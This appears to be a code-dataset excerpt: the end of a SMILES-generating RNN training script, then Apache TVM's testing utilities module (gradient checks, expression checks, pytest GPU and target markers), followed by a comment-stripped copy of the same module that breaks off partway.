parser.add_argument("--epochs", help="Number of epochs to train [DEFAULT: 20]", type=int, default=20)
parser.add_argument("--batch-size", help="Number of molecules processed per batch [DEFAULT: 128]", type=int,
default=128)
parser.add_argument("--lr", help="Learning rate for training [DEFAULT: 0.0005]", type=float, default=0.0005)
parser.add_argument("--patience",
help=("Number of steps where the training get stopped if no loss improvement is noticed. "
"[DEFAULT: 30000]"),
type=int, default=30000)
parser.add_argument("--temperature", "-t",
help=("Temperature for the sequence sampling. Has to be larger than 0. Values below 1 make "
"the RNN more confident in it's generation, but also more conservative. "
"Values larger than 1 result in more random sequences. [DEFAULT: 1.0]"),
type=float, default=1.0)
args = parser.parse_args()
# setup the logger to get a nice output
logging.basicConfig(level=logging.DEBUG,
format='%(asctime)s: %(module)s.%(funcName)s +%(lineno)s: %(levelname)-8s %(message)s',
datefmt='%H:%M:%S'
)
model = models.reinvent.Model.load_from_file(args.input_model)
logging.info("Reading smiles...")
with open(args.input_smiles, 'r') as f:
lines = [line.strip().split()[0] for line in f]
logging.info("Read {} lines".format(len(lines)))
if args.standardize_smiles:
logging.info("Standardize SMILES")
smiles_list = smiles.standardize_smiles_list(lines)
else:
smiles_list = lines
train(model, smiles_list, model_path=args.output_model, epochs=args.epochs, batch_size=args.batch_size,
lr=args.lr, patience=args.patience, save_each_epoch=args.save_each_epoch,
steps_to_change_lr=args.steps_to_change_lr, lr_change=args.lr_change, temperature=args.temperature)
if __name__ == "__main__":
main()
| true | true |
1c3346169c6bab4811d070c2ac8b31e6fa4fdb84 | 24,960 | py | Python | python/tvm/testing.py | dvhg/tvm | 288e9ef41d7884cea3d868d6d2bbb672c058757b | [
"Zlib",
"Unlicense",
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0"
] | 90 | 2019-01-26T00:38:49.000Z | 2022-03-11T23:12:34.000Z | python/tvm/testing.py | dvhg/tvm | 288e9ef41d7884cea3d868d6d2bbb672c058757b | [
"Zlib",
"Unlicense",
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0"
] | 91 | 2019-02-27T00:17:01.000Z | 2022-02-21T18:08:21.000Z | python/tvm/testing.py | dvhg/tvm | 288e9ef41d7884cea3d868d6d2bbb672c058757b | [
"Zlib",
"Unlicense",
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0"
] | 41 | 2019-01-28T14:37:03.000Z | 2022-03-31T03:58:57.000Z | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=invalid-name,unnecessary-comprehension
""" TVM testing utilities
Testing Markers
***************
We use pytest markers to specify the requirements of test functions. Currently
there is a single distinction that matters for our testing environment: does
the test require a gpu. For tests that require just a gpu or just a cpu, we
have the decorator :py:func:`requires_gpu` that enables the test when a gpu is
available. To avoid running tests that don't require a gpu on gpu nodes, this
decorator also sets the pytest marker `gpu` so we can use select the gpu subset
of tests (using `pytest -m gpu`).
Unfortunately, many tests are written like this:
.. python::
def test_something():
for target in all_targets():
do_something()
The test uses both gpu and cpu targets, so the test needs to be run on both cpu
and gpu nodes. But we still want to only run the cpu targets on the cpu testing
node. The solution is to mark these tests with the gpu marker so they will be
run on the gpu nodes. But we also modify all_targets (renamed to
enabled_targets) so that it only returns gpu targets on gpu nodes and cpu
targets on cpu nodes (using an environment variable).
Instead of using the all_targets function, future tests that would like to
test against a variety of targets should use the
:py:func:`tvm.testing.parametrize_targets` functionality. This allows us
greater control over which targets are run on which testing nodes.
If in the future we want to add a new type of testing node (for example
fpgas), we need to add a new marker in `tests/python/pytest.ini` and a new
function in this module. Then targets using this node should be added to the
`TVM_TEST_TARGETS` environment variable in the CI.
"""
import logging
import os
import sys
import time
import pytest
import numpy as np
import tvm
import tvm.arith
import tvm.tir
import tvm.te
import tvm._ffi
from tvm.contrib import nvcc
def assert_allclose(actual, desired, rtol=1e-7, atol=1e-7):
"""Version of np.testing.assert_allclose with `atol` and `rtol` fields set
in reasonable defaults.
Arguments `actual` and `desired` are not interchangable, since the function
compares the `abs(actual-desired)` with `atol+rtol*abs(desired)`. Since we
often allow `desired` to be close to zero, we generally want non-zero `atol`.
"""
actual = np.asanyarray(actual)
desired = np.asanyarray(desired)
np.testing.assert_allclose(actual.shape, desired.shape)
np.testing.assert_allclose(actual, desired, rtol=rtol, atol=atol, verbose=True)
def check_numerical_grads(
function, input_values, grad_values, function_value=None, delta=1e-3, atol=1e-2, rtol=0.1
):
"""A helper function that checks that numerical gradients of a function are
equal to gradients computed in some different way (analytical gradients).
Numerical gradients are computed using finite difference approximation. To
reduce the number of function evaluations, the number of points used is
gradually increased if the error value is too high (up to 5 points).
Parameters
----------
function
A function that takes inputs either as positional or as keyword
arguments (either `function(*input_values)` or `function(**input_values)`
should be correct) and returns a scalar result. Should accept numpy
ndarrays.
input_values : Dict[str, numpy.ndarray] or List[numpy.ndarray]
A list of values or a dict assigning values to variables. Represents the
point at which gradients should be computed.
grad_values : Dict[str, numpy.ndarray] or List[numpy.ndarray]
Gradients computed using a different method.
function_value : float, optional
Should be equal to `function(**input_values)`.
delta : float, optional
A small number used for numerical computation of partial derivatives.
The default 1e-3 is a good choice for float32.
atol : float, optional
Absolute tolerance. Gets multiplied by `sqrt(n)` where n is the size of a
gradient.
rtol : float, optional
Relative tolerance.
"""
# If input_values is a list then function accepts positional arguments
# In this case transform it to a function taking kwargs of the form {"0": ..., "1": ...}
if not isinstance(input_values, dict):
input_len = len(input_values)
input_values = {str(idx): val for idx, val in enumerate(input_values)}
def _function(_input_len=input_len, _orig_function=function, **kwargs):
return _orig_function(*(kwargs[str(i)] for i in range(input_len)))
function = _function
grad_values = {str(idx): val for idx, val in enumerate(grad_values)}
if function_value is None:
function_value = function(**input_values)
# a helper to modify j-th element of val by a_delta
def modify(val, j, a_delta):
val = val.copy()
val.reshape(-1)[j] = val.reshape(-1)[j] + a_delta
return val
# numerically compute a partial derivative with respect to j-th element of the var `name`
def derivative(x_name, j, a_delta):
modified_values = {
n: modify(val, j, a_delta) if n == x_name else val for n, val in input_values.items()
}
return (function(**modified_values) - function_value) / a_delta
def compare_derivative(j, n_der, grad):
der = grad.reshape(-1)[j]
return np.abs(n_der - der) < atol + rtol * np.abs(n_der)
for x_name, grad in grad_values.items():
if grad.shape != input_values[x_name].shape:
raise AssertionError(
"Gradient wrt '{}' has unexpected shape {}, expected {} ".format(
x_name, grad.shape, input_values[x_name].shape
)
)
ngrad = np.zeros_like(grad)
wrong_positions = []
# compute partial derivatives for each position in this variable
for j in range(np.prod(grad.shape)):
# forward difference approximation
nder = derivative(x_name, j, delta)
# if the derivative is not equal to the analytical one, try to use more
# precise and expensive methods
if not compare_derivative(j, nder, grad):
# central difference approximation
nder = (derivative(x_name, j, -delta) + nder) / 2
if not compare_derivative(j, nder, grad):
# central difference approximation using h = delta/2
cnder2 = (
derivative(x_name, j, delta / 2) + derivative(x_name, j, -delta / 2)
) / 2
# five-point derivative
nder = (4 * cnder2 - nder) / 3
# if the derivatives still don't match, add this position to the
# list of wrong positions
if not compare_derivative(j, nder, grad):
wrong_positions.append(np.unravel_index(j, grad.shape))
ngrad.reshape(-1)[j] = nder
wrong_percentage = int(100 * len(wrong_positions) / np.prod(grad.shape))
dist = np.sqrt(np.sum((ngrad - grad) ** 2))
grad_norm = np.sqrt(np.sum(ngrad ** 2))
if not (np.isfinite(dist) and np.isfinite(grad_norm)):
raise ValueError(
"NaN or infinity detected during numerical gradient checking wrt '{}'\n"
"analytical grad = {}\n numerical grad = {}\n".format(x_name, grad, ngrad)
)
# we multiply atol by this number to make it more universal for different sizes
sqrt_n = np.sqrt(float(np.prod(grad.shape)))
if dist > atol * sqrt_n + rtol * grad_norm:
raise AssertionError(
"Analytical and numerical grads wrt '{}' differ too much\n"
"analytical grad = {}\n numerical grad = {}\n"
"{}% of elements differ, first 10 of wrong positions: {}\n"
"distance > atol*sqrt(n) + rtol*grad_norm\n"
"distance {} > {}*{} + {}*{}".format(
x_name,
grad,
ngrad,
wrong_percentage,
wrong_positions[:10],
dist,
atol,
sqrt_n,
rtol,
grad_norm,
)
)
max_diff = np.max(np.abs(ngrad - grad))
avg_diff = np.mean(np.abs(ngrad - grad))
logging.info(
"Numerical grad test wrt '%s' of shape %s passes, "
"dist = %f, max_diff = %f, avg_diff = %f",
x_name,
grad.shape,
dist,
max_diff,
avg_diff,
)
def assert_prim_expr_equal(lhs, rhs):
"""Assert lhs and rhs equals to each iother.
Parameters
----------
lhs : tvm.tir.PrimExpr
The left operand.
rhs : tvm.tir.PrimExpr
The left operand.
"""
ana = tvm.arith.Analyzer()
res = ana.simplify(lhs - rhs)
equal = isinstance(res, tvm.tir.IntImm) and res.value == 0
if not equal:
raise ValueError("{} and {} are not equal".format(lhs, rhs))
def check_bool_expr_is_true(bool_expr, vranges, cond=None):
"""Check that bool_expr holds given the condition cond
for every value of free variables from vranges.
for example, 2x > 4y solves to x > 2y given x in (0, 10) and y in (0, 10)
here bool_expr is x > 2y, vranges is {x: (0, 10), y: (0, 10)}, cond is 2x > 4y
We creates iterations to check,
for x in range(10):
for y in range(10):
assert !(2x > 4y) || (x > 2y)
Parameters
----------
bool_expr : tvm.ir.PrimExpr
Boolean expression to check
vranges: Dict[tvm.tir.expr.Var, tvm.ir.Range]
Free variables and their ranges
cond: tvm.ir.PrimExpr
extra conditions needs to be satisfied.
"""
if cond is not None:
bool_expr = tvm.te.any(tvm.tir.Not(cond), bool_expr)
def _run_expr(expr, vranges):
"""Evaluate expr for every value of free variables
given by vranges and return the tensor of results.
"""
def _compute_body(*us):
vmap = {v: u + r.min for (v, r), u in zip(vranges.items(), us)}
return tvm.tir.stmt_functor.substitute(expr, vmap)
A = tvm.te.compute([r.extent.value for v, r in vranges.items()], _compute_body)
args = [tvm.nd.empty(A.shape, A.dtype)]
sch = tvm.te.create_schedule(A.op)
mod = tvm.build(sch, [A])
mod(*args)
return args[0].numpy()
res = _run_expr(bool_expr, vranges)
if not np.all(res):
indices = list(np.argwhere(res == 0)[0])
counterex = [(str(v), i + r.min) for (v, r), i in zip(vranges.items(), indices)]
counterex = sorted(counterex, key=lambda x: x[0])
counterex = ", ".join([v + " = " + str(i) for v, i in counterex])
ana = tvm.arith.Analyzer()
raise AssertionError(
"Expression {}\nis not true on {}\n"
"Counterexample: {}".format(ana.simplify(bool_expr), vranges, counterex)
)
def check_int_constraints_trans_consistency(constraints_trans, vranges=None):
"""Check IntConstraintsTransform is a bijective transformation.
Parameters
----------
constraints_trans : arith.IntConstraintsTransform
Integer constraints transformation
vranges: Dict[tvm.tir.Var, tvm.ir.Range]
Free variables and their ranges
"""
if vranges is None:
vranges = {}
def _check_forward(constraints1, constraints2, varmap, backvarmap):
ana = tvm.arith.Analyzer()
all_vranges = vranges.copy()
all_vranges.update({v: r for v, r in constraints1.ranges.items()})
# Check that the transformation is injective
cond_on_vars = tvm.tir.const(1, "bool")
for v in constraints1.variables:
if v in varmap:
# variable mapping is consistent
v_back = ana.simplify(tvm.tir.stmt_functor.substitute(varmap[v], backvarmap))
cond_on_vars = tvm.te.all(cond_on_vars, v == v_back)
# Also we have to check that the new relations are true when old relations are true
cond_subst = tvm.tir.stmt_functor.substitute(
tvm.te.all(tvm.tir.const(1, "bool"), *constraints2.relations), backvarmap
)
# We have to include relations from vranges too
for v in constraints2.variables:
if v in constraints2.ranges:
r = constraints2.ranges[v]
range_cond = tvm.te.all(v >= r.min, v < r.min + r.extent)
range_cond = tvm.tir.stmt_functor.substitute(range_cond, backvarmap)
cond_subst = tvm.te.all(cond_subst, range_cond)
cond_subst = ana.simplify(cond_subst)
check_bool_expr_is_true(
tvm.te.all(cond_subst, cond_on_vars),
all_vranges,
cond=tvm.te.all(tvm.tir.const(1, "bool"), *constraints1.relations),
)
_check_forward(
constraints_trans.src,
constraints_trans.dst,
constraints_trans.src_to_dst,
constraints_trans.dst_to_src,
)
_check_forward(
constraints_trans.dst,
constraints_trans.src,
constraints_trans.dst_to_src,
constraints_trans.src_to_dst,
)
def _get_targets():
target_str = os.environ.get("TVM_TEST_TARGETS", "")
if len(target_str) == 0:
target_str = DEFAULT_TEST_TARGETS
targets = set()
for dev in target_str.split(";"):
if len(dev) == 0:
continue
target_kind = dev.split()[0]
if tvm.runtime.enabled(target_kind) and tvm.device(target_kind, 0).exist:
targets.add(dev)
if len(targets) == 0:
logging.warning(
"None of the following targets are supported by this build of TVM: %s."
" Try setting TVM_TEST_TARGETS to a supported target. Defaulting to llvm.",
target_str,
)
return {"llvm"}
return targets
DEFAULT_TEST_TARGETS = (
"llvm;cuda;opencl;metal;rocm;vulkan;nvptx;"
"llvm -device=arm_cpu;opencl -device=mali,aocl_sw_emu"
)
def device_enabled(target):
"""Check if a target should be used when testing.
It is recommended that you use :py:func:`tvm.testing.parametrize_targets`
instead of manually checking if a target is enabled.
This allows the user to control which devices they are testing against. In
tests, this should be used to check if a device should be used when said
device is an optional part of the test.
Parameters
----------
target : str
Target string to check against
Returns
-------
bool
Whether or not the device associated with this target is enabled.
Example
-------
>>> @tvm.testing.uses_gpu
>>> def test_mytest():
>>> for target in ["cuda", "llvm"]:
>>> if device_enabled(target):
>>> test_body...
Here, `test_body` will only be reached by with `target="cuda"` on gpu test
nodes and `target="llvm"` on cpu test nodes.
"""
assert isinstance(target, str), "device_enabled requires a target as a string"
target_kind = target.split(" ")[
0
] # only check if device name is found, sometime there are extra flags
return any([target_kind in test_target for test_target in _get_targets()])
def enabled_targets():
"""Get all enabled targets with associated contexts.
In most cases, you should use :py:func:`tvm.testing.parametrize_targets` instead of
this function.
In this context, enabled means that TVM was built with support for this
target and the target name appears in the TVM_TEST_TARGETS environment
variable. If TVM_TEST_TARGETS is not set, it defaults to variable
DEFAULT_TEST_TARGETS in this module.
If you use this function in a test, you **must** decorate the test with
:py:func:`tvm.testing.uses_gpu` (otherwise it will never be run on the gpu).
Returns
-------
targets: list
A list of pairs of all enabled devices and the associated context
"""
return [(tgt, tvm.device(tgt)) for tgt in _get_targets()]
def _compose(args, decs):
"""Helper to apply multiple markers"""
if len(args) > 0:
f = args[0]
for d in reversed(decs):
f = d(f)
return f
return decs
def uses_gpu(*args):
"""Mark to differentiate tests that use the GPU in some capacity.
These tests will be run on CPU-only test nodes and on test nodes with GPUs.
To mark a test that must have a GPU present to run, use
:py:func:`tvm.testing.requires_gpu`.
Parameters
----------
f : function
Function to mark
"""
_uses_gpu = [pytest.mark.gpu]
return _compose(args, _uses_gpu)
def requires_gpu(*args):
"""Mark a test as requiring a GPU to run.
Tests with this mark will not be run unless a gpu is present.
Parameters
----------
f : function
Function to mark
"""
_requires_gpu = [
pytest.mark.skipif(
not tvm.cuda().exist
and not tvm.rocm().exist
and not tvm.opencl().exist
and not tvm.metal().exist
and not tvm.vulkan().exist,
reason="No GPU present",
),
*uses_gpu(),
]
return _compose(args, _requires_gpu)
def requires_cuda(*args):
"""Mark a test as requiring the CUDA runtime.
This also marks the test as requiring a cuda gpu.
Parameters
----------
f : function
Function to mark
"""
_requires_cuda = [
pytest.mark.cuda,
pytest.mark.skipif(not device_enabled("cuda"), reason="CUDA support not enabled"),
*requires_gpu(),
]
return _compose(args, _requires_cuda)
def requires_cudagraph(*args):
"""Mark a test as requiring the CUDA Graph Feature
This also marks the test as requiring cuda
Parameters
----------
f : function
Function to mark
"""
_requires_cudagraph = [
pytest.mark.skipif(
not nvcc.have_cudagraph(), reason="CUDA Graph is not supported in this environment"
),
*requires_cuda(),
]
return _compose(args, _requires_cudagraph)
def requires_opencl(*args):
"""Mark a test as requiring the OpenCL runtime.
This also marks the test as requiring a gpu.
Parameters
----------
f : function
Function to mark
"""
_requires_opencl = [
pytest.mark.opencl,
pytest.mark.skipif(not device_enabled("opencl"), reason="OpenCL support not enabled"),
*requires_gpu(),
]
return _compose(args, _requires_opencl)
def requires_rocm(*args):
"""Mark a test as requiring the rocm runtime.
This also marks the test as requiring a gpu.
Parameters
----------
f : function
Function to mark
"""
_requires_rocm = [
pytest.mark.rocm,
pytest.mark.skipif(not device_enabled("rocm"), reason="rocm support not enabled"),
*requires_gpu(),
]
return _compose(args, _requires_rocm)
def requires_metal(*args):
"""Mark a test as requiring the metal runtime.
This also marks the test as requiring a gpu.
Parameters
----------
f : function
Function to mark
"""
_requires_metal = [
pytest.mark.metal,
pytest.mark.skipif(not device_enabled("metal"), reason="metal support not enabled"),
*requires_gpu(),
]
return _compose(args, _requires_metal)
def requires_vulkan(*args):
"""Mark a test as requiring the vulkan runtime.
This also marks the test as requiring a gpu.
Parameters
----------
f : function
Function to mark
"""
_requires_vulkan = [
pytest.mark.vulkan,
pytest.mark.skipif(not device_enabled("vulkan"), reason="vulkan support not enabled"),
*requires_gpu(),
]
return _compose(args, _requires_vulkan)
def requires_tensorcore(*args):
"""Mark a test as requiring a tensorcore to run.
Tests with this mark will not be run unless a tensorcore is present.
Parameters
----------
f : function
Function to mark
"""
_requires_tensorcore = [
pytest.mark.tensorcore,
pytest.mark.skipif(
not tvm.cuda().exist or not nvcc.have_tensorcore(tvm.cuda(0).compute_version),
reason="No tensorcore present",
),
*requires_gpu(),
]
return _compose(args, _requires_tensorcore)
def requires_llvm(*args):
"""Mark a test as requiring llvm to run.
Parameters
----------
f : function
Function to mark
"""
_requires_llvm = [
pytest.mark.llvm,
pytest.mark.skipif(not device_enabled("llvm"), reason="LLVM support not enabled"),
]
return _compose(args, _requires_llvm)
def requires_micro(*args):
"""Mark a test as requiring microTVM to run.
Parameters
----------
f : function
Function to mark
"""
_requires_micro = [
pytest.mark.skipif(
tvm.support.libinfo().get("USE_MICRO", "OFF") != "ON",
reason="MicroTVM support not enabled. Set USE_MICRO=ON in config.cmake to enable.",
)
]
return _compose(args, _requires_micro)
def requires_rpc(*args):
"""Mark a test as requiring rpc to run.
Parameters
----------
f : function
Function to mark
"""
_requires_rpc = [
pytest.mark.skipif(
tvm.support.libinfo().get("USE_RPC", "OFF") != "ON",
reason="RPC support not enabled. Set USE_RPC=ON in config.cmake to enable.",
)
]
return _compose(args, _requires_rpc)
def _target_to_requirement(target):
# mapping from target to decorator
if target.startswith("cuda"):
return requires_cuda()
if target.startswith("rocm"):
return requires_rocm()
if target.startswith("vulkan"):
return requires_vulkan()
if target.startswith("nvptx"):
return [*requires_llvm(), *requires_gpu()]
if target.startswith("metal"):
return requires_metal()
if target.startswith("opencl"):
return requires_opencl()
if target.startswith("llvm"):
return requires_llvm()
return []
def parametrize_targets(*args):
"""Parametrize a test over all enabled targets.
Use this decorator when you want your test to be run over a variety of
targets and devices (including cpu and gpu devices).
Parameters
----------
f : function
Function to parametrize. Must be of the form `def test_xxxxxxxxx(target, dev)`:,
where `xxxxxxxxx` is any name.
targets : list[str], optional
Set of targets to run against. If not supplied,
:py:func:`tvm.testing.enabled_targets` will be used.
Example
-------
>>> @tvm.testing.parametrize
>>> def test_mytest(target, dev):
>>> ... # do something
Or
>>> @tvm.testing.parametrize("llvm", "cuda")
>>> def test_mytest(target, dev):
>>> ... # do something
"""
def wrap(targets):
def func(f):
params = [
pytest.param(target, tvm.device(target, 0), marks=_target_to_requirement(target))
for target in targets
]
return pytest.mark.parametrize("target,dev", params)(f)
return func
if len(args) == 1 and callable(args[0]):
targets = [t for t, _ in enabled_targets()]
return wrap(targets)(args[0])
return wrap(args)
def identity_after(x, sleep):
"""Testing function to return identity after sleep
Parameters
----------
x : int
The input value.
sleep : float
The amount of time to sleep
Returns
-------
x : object
The original value
"""
if sleep:
time.sleep(sleep)
return x
def terminate_self():
"""Testing function to terminate the process."""
sys.exit(-1)
tvm._ffi._init_api("testing", __name__)
| 32.206452 | 97 | 0.626282 |
import logging
import os
import sys
import time
import pytest
import numpy as np
import tvm
import tvm.arith
import tvm.tir
import tvm.te
import tvm._ffi
from tvm.contrib import nvcc
def assert_allclose(actual, desired, rtol=1e-7, atol=1e-7):
actual = np.asanyarray(actual)
desired = np.asanyarray(desired)
np.testing.assert_allclose(actual.shape, desired.shape)
np.testing.assert_allclose(actual, desired, rtol=rtol, atol=atol, verbose=True)
def check_numerical_grads(
function, input_values, grad_values, function_value=None, delta=1e-3, atol=1e-2, rtol=0.1
):
if not isinstance(input_values, dict):
input_len = len(input_values)
input_values = {str(idx): val for idx, val in enumerate(input_values)}
def _function(_input_len=input_len, _orig_function=function, **kwargs):
return _orig_function(*(kwargs[str(i)] for i in range(input_len)))
function = _function
grad_values = {str(idx): val for idx, val in enumerate(grad_values)}
if function_value is None:
function_value = function(**input_values)
def modify(val, j, a_delta):
val = val.copy()
val.reshape(-1)[j] = val.reshape(-1)[j] + a_delta
return val
def derivative(x_name, j, a_delta):
modified_values = {
n: modify(val, j, a_delta) if n == x_name else val for n, val in input_values.items()
}
return (function(**modified_values) - function_value) / a_delta
def compare_derivative(j, n_der, grad):
der = grad.reshape(-1)[j]
return np.abs(n_der - der) < atol + rtol * np.abs(n_der)
for x_name, grad in grad_values.items():
if grad.shape != input_values[x_name].shape:
raise AssertionError(
"Gradient wrt '{}' has unexpected shape {}, expected {} ".format(
x_name, grad.shape, input_values[x_name].shape
)
)
ngrad = np.zeros_like(grad)
wrong_positions = []
for j in range(np.prod(grad.shape)):
nder = derivative(x_name, j, delta)
if not compare_derivative(j, nder, grad):
nder = (derivative(x_name, j, -delta) + nder) / 2
if not compare_derivative(j, nder, grad):
cnder2 = (
derivative(x_name, j, delta / 2) + derivative(x_name, j, -delta / 2)
) / 2
nder = (4 * cnder2 - nder) / 3
# list of wrong positions
if not compare_derivative(j, nder, grad):
wrong_positions.append(np.unravel_index(j, grad.shape))
ngrad.reshape(-1)[j] = nder
wrong_percentage = int(100 * len(wrong_positions) / np.prod(grad.shape))
dist = np.sqrt(np.sum((ngrad - grad) ** 2))
grad_norm = np.sqrt(np.sum(ngrad ** 2))
if not (np.isfinite(dist) and np.isfinite(grad_norm)):
raise ValueError(
"NaN or infinity detected during numerical gradient checking wrt '{}'\n"
"analytical grad = {}\n numerical grad = {}\n".format(x_name, grad, ngrad)
)
# we multiply atol by this number to make it more universal for different sizes
sqrt_n = np.sqrt(float(np.prod(grad.shape)))
if dist > atol * sqrt_n + rtol * grad_norm:
raise AssertionError(
"Analytical and numerical grads wrt '{}' differ too much\n"
"analytical grad = {}\n numerical grad = {}\n"
"{}% of elements differ, first 10 of wrong positions: {}\n"
"distance > atol*sqrt(n) + rtol*grad_norm\n"
"distance {} > {}*{} + {}*{}".format(
x_name,
grad,
ngrad,
wrong_percentage,
wrong_positions[:10],
dist,
atol,
sqrt_n,
rtol,
grad_norm,
)
)
max_diff = np.max(np.abs(ngrad - grad))
avg_diff = np.mean(np.abs(ngrad - grad))
logging.info(
"Numerical grad test wrt '%s' of shape %s passes, "
"dist = %f, max_diff = %f, avg_diff = %f",
x_name,
grad.shape,
dist,
max_diff,
avg_diff,
)
def assert_prim_expr_equal(lhs, rhs):
ana = tvm.arith.Analyzer()
res = ana.simplify(lhs - rhs)
equal = isinstance(res, tvm.tir.IntImm) and res.value == 0
if not equal:
raise ValueError("{} and {} are not equal".format(lhs, rhs))
def check_bool_expr_is_true(bool_expr, vranges, cond=None):
if cond is not None:
bool_expr = tvm.te.any(tvm.tir.Not(cond), bool_expr)
def _run_expr(expr, vranges):
def _compute_body(*us):
vmap = {v: u + r.min for (v, r), u in zip(vranges.items(), us)}
return tvm.tir.stmt_functor.substitute(expr, vmap)
A = tvm.te.compute([r.extent.value for v, r in vranges.items()], _compute_body)
args = [tvm.nd.empty(A.shape, A.dtype)]
sch = tvm.te.create_schedule(A.op)
mod = tvm.build(sch, [A])
mod(*args)
return args[0].numpy()
res = _run_expr(bool_expr, vranges)
if not np.all(res):
indices = list(np.argwhere(res == 0)[0])
counterex = [(str(v), i + r.min) for (v, r), i in zip(vranges.items(), indices)]
counterex = sorted(counterex, key=lambda x: x[0])
counterex = ", ".join([v + " = " + str(i) for v, i in counterex])
ana = tvm.arith.Analyzer()
raise AssertionError(
"Expression {}\nis not true on {}\n"
"Counterexample: {}".format(ana.simplify(bool_expr), vranges, counterex)
)
def check_int_constraints_trans_consistency(constraints_trans, vranges=None):
if vranges is None:
vranges = {}
def _check_forward(constraints1, constraints2, varmap, backvarmap):
ana = tvm.arith.Analyzer()
all_vranges = vranges.copy()
all_vranges.update({v: r for v, r in constraints1.ranges.items()})
# Check that the transformation is injective
cond_on_vars = tvm.tir.const(1, "bool")
for v in constraints1.variables:
if v in varmap:
# variable mapping is consistent
v_back = ana.simplify(tvm.tir.stmt_functor.substitute(varmap[v], backvarmap))
cond_on_vars = tvm.te.all(cond_on_vars, v == v_back)
# Also we have to check that the new relations are true when old relations are true
cond_subst = tvm.tir.stmt_functor.substitute(
tvm.te.all(tvm.tir.const(1, "bool"), *constraints2.relations), backvarmap
)
# We have to include relations from vranges too
for v in constraints2.variables:
if v in constraints2.ranges:
r = constraints2.ranges[v]
range_cond = tvm.te.all(v >= r.min, v < r.min + r.extent)
range_cond = tvm.tir.stmt_functor.substitute(range_cond, backvarmap)
cond_subst = tvm.te.all(cond_subst, range_cond)
cond_subst = ana.simplify(cond_subst)
check_bool_expr_is_true(
tvm.te.all(cond_subst, cond_on_vars),
all_vranges,
cond=tvm.te.all(tvm.tir.const(1, "bool"), *constraints1.relations),
)
_check_forward(
constraints_trans.src,
constraints_trans.dst,
constraints_trans.src_to_dst,
constraints_trans.dst_to_src,
)
_check_forward(
constraints_trans.dst,
constraints_trans.src,
constraints_trans.dst_to_src,
constraints_trans.src_to_dst,
)
def _get_targets():
target_str = os.environ.get("TVM_TEST_TARGETS", "")
if len(target_str) == 0:
target_str = DEFAULT_TEST_TARGETS
targets = set()
for dev in target_str.split(";"):
if len(dev) == 0:
continue
target_kind = dev.split()[0]
if tvm.runtime.enabled(target_kind) and tvm.device(target_kind, 0).exist:
targets.add(dev)
if len(targets) == 0:
logging.warning(
"None of the following targets are supported by this build of TVM: %s."
" Try setting TVM_TEST_TARGETS to a supported target. Defaulting to llvm.",
target_str,
)
return {"llvm"}
return targets
DEFAULT_TEST_TARGETS = (
"llvm;cuda;opencl;metal;rocm;vulkan;nvptx;"
"llvm -device=arm_cpu;opencl -device=mali,aocl_sw_emu"
)
def device_enabled(target):
assert isinstance(target, str), "device_enabled requires a target as a string"
target_kind = target.split(" ")[
0
] # only check if device name is found, sometime there are extra flags
return any([target_kind in test_target for test_target in _get_targets()])
def enabled_targets():
return [(tgt, tvm.device(tgt)) for tgt in _get_targets()]
def _compose(args, decs):
if len(args) > 0:
f = args[0]
for d in reversed(decs):
f = d(f)
return f
return decs
def uses_gpu(*args):
_uses_gpu = [pytest.mark.gpu]
return _compose(args, _uses_gpu)
def requires_gpu(*args):
_requires_gpu = [
pytest.mark.skipif(
not tvm.cuda().exist
and not tvm.rocm().exist
and not tvm.opencl().exist
and not tvm.metal().exist
and not tvm.vulkan().exist,
reason="No GPU present",
),
*uses_gpu(),
]
return _compose(args, _requires_gpu)
def requires_cuda(*args):
_requires_cuda = [
pytest.mark.cuda,
pytest.mark.skipif(not device_enabled("cuda"), reason="CUDA support not enabled"),
*requires_gpu(),
]
return _compose(args, _requires_cuda)
def requires_cudagraph(*args):
_requires_cudagraph = [
pytest.mark.skipif(
not nvcc.have_cudagraph(), reason="CUDA Graph is not supported in this environment"
),
*requires_cuda(),
]
return _compose(args, _requires_cudagraph)
def requires_opencl(*args):
_requires_opencl = [
pytest.mark.opencl,
pytest.mark.skipif(not device_enabled("opencl"), reason="OpenCL support not enabled"),
*requires_gpu(),
]
return _compose(args, _requires_opencl)
def requires_rocm(*args):
_requires_rocm = [
pytest.mark.rocm,
pytest.mark.skipif(not device_enabled("rocm"), reason="rocm support not enabled"),
*requires_gpu(),
]
return _compose(args, _requires_rocm)
def requires_metal(*args):
_requires_metal = [
pytest.mark.metal,
pytest.mark.skipif(not device_enabled("metal"), reason="metal support not enabled"),
*requires_gpu(),
]
return _compose(args, _requires_metal)
def requires_vulkan(*args):
_requires_vulkan = [
pytest.mark.vulkan,
pytest.mark.skipif(not device_enabled("vulkan"), reason="vulkan support not enabled"),
*requires_gpu(),
]
return _compose(args, _requires_vulkan)
def requires_tensorcore(*args):
_requires_tensorcore = [
pytest.mark.tensorcore,
pytest.mark.skipif(
not tvm.cuda().exist or not nvcc.have_tensorcore(tvm.cuda(0).compute_version),
reason="No tensorcore present",
),
*requires_gpu(),
]
return _compose(args, _requires_tensorcore)
def requires_llvm(*args):
_requires_llvm = [
pytest.mark.llvm,
pytest.mark.skipif(not device_enabled("llvm"), reason="LLVM support not enabled"),
]
return _compose(args, _requires_llvm)
def requires_micro(*args):
_requires_micro = [
pytest.mark.skipif(
tvm.support.libinfo().get("USE_MICRO", "OFF") != "ON",
reason="MicroTVM support not enabled. Set USE_MICRO=ON in config.cmake to enable.",
)
]
return _compose(args, _requires_micro)
def requires_rpc(*args):
_requires_rpc = [
pytest.mark.skipif(
tvm.support.libinfo().get("USE_RPC", "OFF") != "ON",
reason="RPC support not enabled. Set USE_RPC=ON in config.cmake to enable.",
)
]
return _compose(args, _requires_rpc)
def _target_to_requirement(target):
# mapping from target to decorator
if target.startswith("cuda"):
return requires_cuda()
if target.startswith("rocm"):
return requires_rocm()
if target.startswith("vulkan"):
return requires_vulkan()
if target.startswith("nvptx"):
